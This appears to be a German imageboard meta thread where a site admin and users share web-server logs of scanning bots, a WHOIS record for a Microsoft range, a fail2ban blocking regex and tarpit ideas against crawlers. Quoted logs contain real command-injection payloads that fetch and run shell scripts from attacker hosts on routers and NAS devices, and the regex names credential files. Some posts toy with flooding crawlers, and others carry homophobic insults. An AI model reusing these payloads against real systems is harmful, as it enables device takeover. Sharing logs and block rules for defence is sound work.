Aussehen
Suche Einloggen
[c] [meta] [fefe] [erp]

/meta/ – Diskussionen über Dietchan


Antwort erstellen

(≤ 4)



[Zurück]

  • [l] Täglich millionenfache Cyberangriffe mit hoher kriminieller Energie!!1 Zuse ## Admin Fri, 14 Nov 2025 19:26:21 GMT Nr. 160251
    JPG 640×622 144.8k
    Kann zufällig jemand erklären, warum inzwischen gefühlt 80% von diesem Müll aus den Netzen von Microsoft kommt? Diejenigen von euch, die einen Servierer betreiben: Erlebt ihr das auch? Ist Microsoft das neue OVH?

    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:37 +0000] "GET /wp-includes/Text/network.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /wp-includes/Text/network.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /wp-content/upgrade-temp-backup/wp-login.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /wp-content/upgrade-temp-backup/wp-login.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /js/fm.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /js/fm.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /wp-content/themes/astra/inc/ki1k.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /wp-content/themes/astra/inc/ki1k.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /WordPress/wp-admin/includes/zmFM.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /WordPress/wp-admin/includes/zmFM.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /default.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /default.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /ty.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /ty.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /wp-content/themes/cay-van-phong/filemanager.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /wp-content/themes/cay-van-phong/filemanager.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /fm.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /fm.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /wp-content/plugins/seoplugins/index.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:38 +0000] "GET /wp-content/plugins/seoplugins/index.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /ini.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /ini.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /libraries/legacy/info.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /libraries/legacy/info.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wp-content/themes/include.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wp-content/themes/include.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wp-admin/network/about.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wp-admin/network/about.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /alfa.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /alfa.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wp-mail.php/wp-includes/ID3/rk2.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wp-mail.php/wp-includes/ID3/rk2.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /assets/images/28c5400b0b.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /assets/images/28c5400b0b.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wordpress/wp-includes/wp-config-sample.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wordpress/wp-includes/wp-config-sample.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wp-mail.php/wp-includes/ID3/.info.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wp-mail.php/wp-includes/ID3/.info.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wp-includes/Text/Diff/Engine/about.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wp-includes/Text/Diff/Engine/about.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wp-includes/js/tinymce/skins/lightgray/img/about.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:39 +0000] "GET /wp-includes/js/tinymce/skins/lightgray/img/about.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:40 +0000] "GET /wp-includes/block-supports/autoload_classmap.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:40 +0000] "GET /wp-includes/block-supports/autoload_classmap.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:40 +0000] "GET /wp-content/uploads/classwithtostring.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:40 +0000] "GET /wp-content/uploads/classwithtostring.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:40 +0000] "GET /wp-admin/images/install.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:40 +0000] "GET /wp-admin/images/install.php HTTP/1.1" 404 29 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:40 +0000] "GET /.well-known/link.php HTTP/1.1" 301 169 "-" "-"
    dietchan.org 4.205.179.237 - - [14/Nov/2025:19:12:40 +0000] "GET /.well-known/link.php HTTP/1.1" 404 153 "-" "-"
    
    ... abgekürzt weil Pfosten sonst zu lang....
    


    #
    # ARIN WHOIS data and services are subject to the Terms of Use
    # available at: https://www.arin.net/resources/registry/whois/tou/
    #
    # If you see inaccuracies in the results, please report at
    # https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
    #
    # Copyright 1997-2025, American Registry for Internet Numbers, Ltd.
    #
    
    
    NetRange:       4.192.0.0 - 4.207.255.255
    CIDR:           4.192.0.0/12
    NetName:        MSFT
    NetHandle:      NET-4-192-0-0-2
    Parent:         NET4 (NET-4-0-0-0-0)
    NetType:        Direct Allocation
    OriginAS:
    Organization:   Microsoft Corporation (MSFT)
    RegDate:        2020-07-07
    Updated:        2020-07-07
    Ref:            https://rdap.arin.net/registry/ip/4.192.0.0
    
    
    
    OrgName:        Microsoft Corporation
    OrgId:          MSFT
    Address:        One Microsoft Way
    City:           Redmond
    StateProv:      WA
    PostalCode:     98052
    Country:        US
    RegDate:        1998-07-10
    Updated:        2025-06-10
    Comment:        To report suspected security issues specific to traffic emanating from Microsoft online services, including the distribution of malicious content or other illicit or illegal material through a Microsoft online service, please submit reports to:
    Comment:        * https://cert.microsoft.com.
    Comment:
    Comment:        For SPAM and other abuse issues, such as Microsoft Accounts, please contact:
    Comment:        * abuse@microsoft.com.
    Comment:
    Comment:        To report security vulnerabilities in Microsoft products and services, please contact:
    Comment:        * secure@microsoft.com.
    Comment:
    Comment:        For legal and law enforcement-related requests, please contact:
    Comment:        * msndcc@microsoft.com
    Comment:
    Comment:        For routing, peering or DNS issues, please
    Comment:        contact:
    Comment:        * IOC@microsoft.com
    Ref:            https://rdap.arin.net/registry/entity/MSFT
    


    Ich hoffe, niemand von euch benutzt ein VPN, das bei Azure eingemietet ist. Dann kommt ihr hier bald möglicherweise nur noch über Tor rein. Denn deren Ranges werden jetzt radikal geblockt.
  • [l] Zuse ## Admin Fri, 14 Nov 2025 19:37:34 GMT Nr. 160252
    JPG 640×800 191.0k
    Sehr lustig ist übrigens auch, dass deren Bring-Crawler mehr als sieben Jahre nach Eröffnung dieses Kanals immer noch nicht mit dem download-Attribut des <a>-Elements klarkommt in Code wie diesem:
    <a href="/uploads/1763148381001.jpg" download="microsoft illuminati.jpg" title="microsoft illuminati.jpg">microsoft illuminati.jpg</a>

    Weshalb die Logs außerdem voll sind von sowas:
    dietchan.org 52.167.144.166 - - [14/Nov/2025:17:22:47 +0000] "GET /c/golden_ratio_woman_by_davidgeoffroy_d2yrvvi-fullview.jpg HTTP/2.0" 404 24 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.19>

    Gibt natürlich jedes mal einen 404. Aber das hat nach über sieben Jahren anscheinend immer noch niemand dort bemerkt oder zu beheben versucht. Kompetenz auf allen Ebenen.
  • [l] Felix Sun, 16 Nov 2025 11:02:45 GMT Nr. 160259
    Nein, tatsächlich weniger. Bei mir hats nur fünf Einträge aus der von dir pfostierten Reichweite:
    206.168.34.192 meine_ip - [02/Oct/2025:02:27:42 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 341 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
    104.218.164.192 meine_ip - [22/Oct/2025:01:42:29 +0200] "GET /robots.txt HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
    104.218.164.192 meine_ip - [22/Oct/2025:01:42:29 +0200] "GET /sitemap.xml HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
    104.218.164.192 meine_ip - [22/Oct/2025:01:42:29 +0200] "GET /config.json HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11"
    104.218.164.192 meine_ip - [22/Oct/2025:01:44:00 +0200] "GET /update_weights_from_tensor HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"

    Aber Diskussionsfaden über mögliche Fehler2Sperre-Regeln / andere Ansätze, damit diese Schaber einem wenigstens nicht den Baumstamm volldosen oder lustiger Baumstamm-pfostier-Faden?

    Meine aktuelle Fehler2Sperre-Regel:
    failregex = ^<HOST> .*"(GET|POST|HEAD|PUT|DELETE|OPTIONS|PATCH)[^"]+/(cgi-bin|\.env|\.git|\.svn|\.DS_Store|\.bak|\.backup|\.sql|\.tar|\.gz|\.zip|wp-|xmlrpc|admin|login|dashboard|phpmyadmin|pma|setup|shell|actuator|system|debug|\.idea|\.vscode|vendor|storage|config|test|temp|dev|backup|db|password\.php|geoip|set_safety\.shtml|sysinit\.shtml|_profiler/phpinfo|robots\.txt|sitemap\.xml|\.well-known/security\.txt|admin/assets/js/views/login\.js|\.env\.local|\.htaccess|\.htpasswd|config\.inc\.php|\.user\.ini|error_log|phpunit\.xml|composer\.json|readme\.md|CHANGELOG\.md|docker-compose\.yml|dockerfile|LICENSE|Makefile|Vagrantfile|\.gitignore|id_rsa|id_dsa|authorized_keys|backup\.tar|backup\.zip|\.db|\.sqlite|phpinfo\.php|setup\.php|install\.php|update\.php|vendor\.php|\.ssh|\.bash_history|\.mysql_history|\.cache|wp-config\.php)[^"]*" (404|403|400)
    |^<HOST> .*" *" 400

    Aber die fängt nicht alles. Mein Zugriff.Baumstamm von leichthttpd:

    109.105.210.90 meine_ip - [15/Nov/2025:15:58:16 +0100] "GET /ext-js/app/common/zld_product_spec.js HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
    109.105.210.88 meine_ip - [15/Nov/2025:15:58:16 +0100] "GET /solr/ HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
    109.105.210.88 meine_ip - [15/Nov/2025:15:58:29 +0100] "GET /static/historypage.js HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
    109.105.210.90 meine_ip - [15/Nov/2025:15:58:46 +0100] "GET /internal_forms_authentication HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
    204.76.203.30 meine_ip - [15/Nov/2025:16:35:31 +0100] "GET /.env HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36"
    111.22.251.242 127.0.0.1 - [15/Nov/2025:17:01:14 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1" 404 341 "-" "Hello, world"
    45.80.158.123 meine_ip - [15/Nov/2025:17:44:55 +0100] "GET /.env HTTP/1.1" 404 341 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
    45.80.158.123 meine_ip - [15/Nov/2025:17:44:55 +0100] "POST / HTTP/1.1" 200 1147 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
    83.142.209.120 meine_ip - [15/Nov/2025:17:56:07 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 341 "-" "-"
    137.184.115.158 meine_ip - [15/Nov/2025:18:19:21 +0100] "GET /.env HTTP/1.1" 404 341 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
    137.184.115.158 meine_ip - [15/Nov/2025:18:19:21 +0100] "GET /.git/config HTTP/1.1" 404 341 "-" "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);"
    103.252.89.75 meine_ip - [15/Nov/2025:18:27:09 +0100] "GET /set_safety.shtml?r=52300 HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
    103.252.89.75 meine_ip - [15/Nov/2025:18:27:15 +0100] "GET /sysinit.shtml HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
    45.135.193.162 ip-api.com - [15/Nov/2025:19:15:51 +0100] "GET /json/ HTTP/1.1" 404 341 "-" "Go-http-client/1.1"
    79.124.40.174 meine_ip - [15/Nov/2025:20:18:29 +0100] "GET /actuator/gateway/routes HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
    221.159.119.6 meine_ip - [15/Nov/2025:21:16:39 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 404 341 "-" "-"
    221.159.119.6 meine_ip - [15/Nov/2025:21:16:39 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 404 341 "-" "-"
    193.142.147.209 meine_ip - [15/Nov/2025:21:26:49 +0100] "POST /login.cgi/cgi_main.cgi HTTP/1.1" 404 341 "http://meine_ip:80/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
    78.153.140.177 meine_ip - [15/Nov/2025:22:03:52 +0100] "GET /.env HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36 OPR/41.0.2353.69"
    78.153.140.177 meine_ip - [15/Nov/2025:22:03:53 +0100] "GET /api/.env HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.4 (KHTML, like Gecko) Version/10.1.2 Safari/603.3.4"
    78.153.140.177 meine_ip - [15/Nov/2025:22:03:54 +0100] "GET /backend/.env HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)"
    78.153.140.177 meine_ip - [15/Nov/2025:22:03:54 +0100] "GET /admin/.env HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-T350 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Safari/537.36"
    78.153.140.177 meine_ip - [15/Nov/2025:22:03:54 +0100] "GET /.env.example HTTP/1.1" 404 341 "-" "Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9"
    78.153.140.177 meine_ip - [15/Nov/2025:22:03:54 +0100] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 341 "-" "Mozilla/5.0 (X11; U; Linux x86_64; es-AR; rv:1.9) Gecko/2008061017 Firefox/3.0"
    78.153.140.177 meine_ip - [15/Nov/2025:22:03:56 +0100] "GET /back/.env HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910C Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36"
    78.153.140.177 meine_ip - [15/Nov/2025:22:03:56 +0100] "GET /security/.env HTTP/1.1" 404 341 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
    78.153.140.177 meine_ip - [15/Nov/2025:22:03:56 +0100] "GET /admins/.env HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    78.153.140.177 meine_ip - [15/Nov/2025:22:03:56 +0100] "GET /lib/.env HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36"
    78.153.140.177 meine_ip - [15/Nov/2025:22:03:56 +0100] "GET /shared/.env HTTP/1.1" 404 341 "-" "Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; SPH-M950 Build/IMM76I) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
    78.153.140.177 meine_ip - [15/Nov/2025:22:03:56 +0100] "GET /production/.env HTTP/1.1" 404 341 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092816 Mobile Safari 1.1.3"
    87.121.84.52 meine_ip - [15/Nov/2025:22:39:47 +0100] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=d2dldAlodHRwOi8vODcuMTIxLjg0LjUyL25hcy5kbGluay5zaAktTy18c2g= HTTP/1.0" 404 341 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
    87.121.84.52 meine_ip - [15/Nov/2025:22:39:49 +0100] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=';wget%20http://87.121.84.52/nas.dlink.sh%20-O-%7Csh;' HTTP/1.0" 404 341 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
    87.121.84.52 meine_ip - [15/Nov/2025:22:39:49 +0100] "POST /protocol.csp? HTTP/1.0" 404 341 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0"
  • [l] Felix Sun, 16 Nov 2025 12:37:25 GMT Nr. 160262
    >>160259
    >Bei mir hats nur fünf Einträge aus der von dir pfostierten Reichweite:
    Es ist ja nicht bloß diese. MS hat noch unzählige weitere Ranges. Andere, von denen auch noch recht viel Müll kommt: DigitalOcean und Google.
  • [l] Felix Mon, 17 Nov 2025 17:25:48 GMT Nr. 160294
    Mal blöde Frage: könnte man diese Endpunkte nicht direkt mit /dev/urandom verbinden, damit die Krabbler dann einfach anfangen, ihre Platten vollzuschreiben (und möglicherweise eine horende AWS-Rechnung einfahren)? Ich hab 25gbit hochelfe (ohne Verkehrslimit), der sättigt so einen Krabbler doch bestimmt leicht!

    Und rechtlich ist man wahrscheinlich sogar sicher, schliesslich ist der Krabbler-Betreiber es selbst schuld, ungefragt meine Systeme zu kontaktieren!
  • [l] Felix Wed, 19 Nov 2025 16:55:01 GMT Nr. 160331
    Ich lasse für meine statische Webseite nur noch ein minimales Log mit Zeitstempel, URI und Status-Code laufen, aber die wenigen kritischen Endpunkte (CGI, /.well-known/acme-challenge) mit vollständigem Log sind tatsächlich fast ausschließlich Wolke Blau.
    Das intensive Herumstochern nach WordPress-Sicherheitslücken findet bei mir zum Glück inzwischen nur noch einmal im Quartal statt, wenn das neue TLS-Zertifikat im CT-Log auftaucht, ansonsten ist es nur eine Menge */.env und /.git/config.
  • [l] Felix Thu, 20 Nov 2025 23:29:26 GMT Nr. 160342
    JPG 1375×720 160.8k
    JPG 1300×957 234.1k
    >>160294
    >Mal blöde Frage: könnte man diese Endpunkte nicht direkt mit /dev/urandom verbinden
    Ja, fast: Man baut eine Teergrube. Eine Teergrube ist eine Seite, die super langsam lädt, nur Gebrabbel enthält, aber (wichtig) auf weitere Seiten in der Teergrube verweist, die dann genauso lahm sind und genauso auf weitere Seiten verweisen. Das Gebrabbel ist deterministisch, und sieht damit wie eine Webseite mit statischen Seiten aus. Da kann dann der Krabbler sich so richtig mit einer Geschwindigkeit von 0,1 kB/s austoben, ohne die normalen Seitennutzer in Mitleidenschaft zu ziehen.

    https://zadzmo.org/code/nepenthes/
    https://arstechnica.com/tech-policy/2025/01/ai-haters-build-tarpits-to-trap-and-trick-ai-scrapers-that-ignore-robots-txt/

    Die Demo ist ganz klickenswert:
    https://zadzmo.org/nepenthes-demo/

    >Bild relatiert
    Das wäre dann Plan B.
  • [l] Felix Fri, 21 Nov 2025 05:46:09 GMT Nr. 160348
    >>160342
    Gut, aber wenn man Uplink von 25gbit und kein Trafficlimit hat, dann könnte man da ja auch ordentlich Daten rüber schaufeln, um dem Crawler die Leitung zu und dem Betreiber die Rechnung hochzutreiben, oder? Wenn der Crawler die Daten für wichtig genug zum Speichern hält, dann würde es dazu auch noch die Platten vollmüllen.
    Vlt. kann ich dann sogar mit den einschlägigen Hosting-Betreibern, auf denen diese Crawler laufen, einen Deal machen, dass die mir 10% von der Rechnung, die dabei entsteht, als Provision geben, immerhin habe ich ihnen ein fettes Geschäft beschert!
  • [l] Felix Fri, 21 Nov 2025 07:23:34 GMT Nr. 160352
    >>160348
    >kein Trafficlimit
    So lange, bis dein Anbieter sagt >Hey, fick dich und deinen Vertrag kündigt.
  • [l] Felix Fri, 21 Nov 2025 09:01:34 GMT Nr. 160353
    >>160352
    Mit Init7? Unwahrscheinlich. :)
  • [l] Felix ☎️ Fri, 21 Nov 2025 09:45:41 GMT Nr. 160355
    >>160353
    Probier es doch aus. homo oeconomicus sollte ein Begriff sein? It’s the economy, stupid. Niemand hat Lust auf einen Kunden, an dem er Geld verliert.
  • [l] Felix Fri, 21 Nov 2025 10:17:34 GMT Nr. 160356
    >>160355
    Was hat das jetzt mit Schwulen zu tun?!

    Auch: Warum sollte mein Provider daran Geld verlieren, wenn ich meinen Anschluss nutze? Der wird ja schliesslich dafür bezahlt!
  • [l] Felix Fri, 21 Nov 2025 10:22:28 GMT Nr. 160357
    WEBM 640×360 3:16 6.6M
    >>160356
    Das homo in homo oeconomicus wird hommo ausgesprochen, nicht hohmo, du Homo! Muss man wissen. Muss man wissen!
  • [l] Felix Fri, 21 Nov 2025 10:26:51 GMT Nr. 160358
    >>160357
    Nur Schwuchteln machen da einen Unterschied. Homo ist Homo und fertig, du Homo!
  • [l] Felix Fri, 21 Nov 2025 12:48:42 GMT Nr. 160359
    >>160356
    Nicht quatschen, machen!
  • [l] Felix Sat, 22 Nov 2025 16:01:30 GMT Nr. 160385
    >>160348
    Wie sieht es mit der CPU-Last bei 25 GBit/s aus?

    Wie hoch ist der Stromverbrauch bei 25 GBit/s? Das wird zwar bei Kolokation gemessen (und abgerechnet), aber bei VPS/Root Server ist das bestimmt eine Mischkalkulation, die der Anbieter nicht auf Dauer mitmacht.

    Was ist, wenn der Crawler 1000 Sockets bei einem aufmacht, weil man so schön beim Crawlen mitmacht? Die eigenen System-Ressourcen sind auch nur begrenzt.

    Der Crawler kann im Grunde auch DDoS-mäßig einfach mit mehreren Rechnern auf einmal bei einem alles absaugen. Die Bot-Farm von OpenAI & Co. wird man mit lächerlichen 25 GBit/s nicht aufhalten können, vielmehr saturiert man damit seinen eigenen Hochlad und die anderen menschliche Nutzer können kaum mehr von einem etwas runterladen (wie bei einem DDoS üblich).

    Da gefällt mir der Ansatz "wir locken die Bots in eine Teergrube, in die die menschlichen Nutzer nicht reinfallen" doch besser. Das ist im Grunde auch nichts anderes als Boterkennung. Wäre nur doof, wenn die Botschreiber das irgendwann erkennen und die Bots sich immer mehr wie menschliche Nutzer verhalten würden und nicht in die Teergrube klicken.
  • [l] Felix Sun, 07 Dec 2025 15:20:51 GMT Nr. 160856
    >>160385
    Aber wenn der Bot mir den Link zumacht, kann ich dann nicht rechtlich gegen den Betreiber wegen DDoS vorgehen oder so?
  • [l] Felix Sun, 07 Dec 2025 23:39:22 GMT Nr. 160877
    >>160856
    Kannst du schon.
    Nur nicht, wenn es ein Multi-Billionen-Dollar-Unternehmen ist. Dann gelten andere Regeln.

    https://arstechnica.com/tech-policy/2025/02/meta-torrented-over-81-7tb-of-pirated-books-to-train-ai-authors-say/
    https://en.wikipedia.org/wiki/Aaron_Swartz#United_States_v._Aaron_Swartz
  • [l] Zuse ## Admin Wed, 07 Jan 2026 16:17:36 GMT Nr. 161355 SÄGE
    Spaßfakt: Nachdem ein Großteil ihrer Ranges geblockt wurde, sind sie inzwischen so dreist, dass sie nicht mal mehr vor der Swibel-Adresse zurückschrecken (gekürzt):

    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:42 +0000] "GET /register HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
    dietchankez4[...]xubad.onion 127.0.0.1 - - [07/Jan/2026:09:41:43 +0000] "GET /register.php HTTP/1.1" 301 169 "-" "Mozilla/5.0 [...] Firefox/128.0"
